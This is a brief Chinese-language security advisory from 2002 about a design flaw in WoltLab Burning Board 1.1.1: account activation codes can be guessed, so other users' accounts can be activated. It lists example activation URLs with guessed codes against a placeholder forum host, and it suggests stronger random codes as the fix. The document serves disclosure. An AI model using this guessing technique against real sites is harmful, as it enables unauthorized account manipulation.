WoltLab Burning Board任意帐户可使能漏洞发布时间:2002-05-31 更新时间:2002-05-31 严重程度:中 威胁程度:其它 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:4859 受影响系统 Woltlab Burning Board 1.1.1详细描述 WoltLab Burning Board是免费论坛系统。 其中在新用户注册好后,会有一条使能用户帐户的连接让用户点击才能真正使用功能。但此连接可以猜测,攻击者可以通过提交类似的请求来激活其他帐户。 测试代码 http://forum.dom/forum/action.php?action=activation&userid=346&code=1898087491 http://forum.dom/forum/action.php?action=activation&userid=346&code=1309289693 .... http://forum.dom/forum/action.php?action=activation&userid=346&code=356268007 解决方案 SeazoN <seazon@dnestr.com>建议使用rand()或者md5(uniqid(rand(),1)). 相关信息 SeazoN <seazon@dnestr.com> 参考:http://online.securityfocus.com/archive/1/274269 相关主页:http://www.woltlab.de/en/projects.php?id=1 |
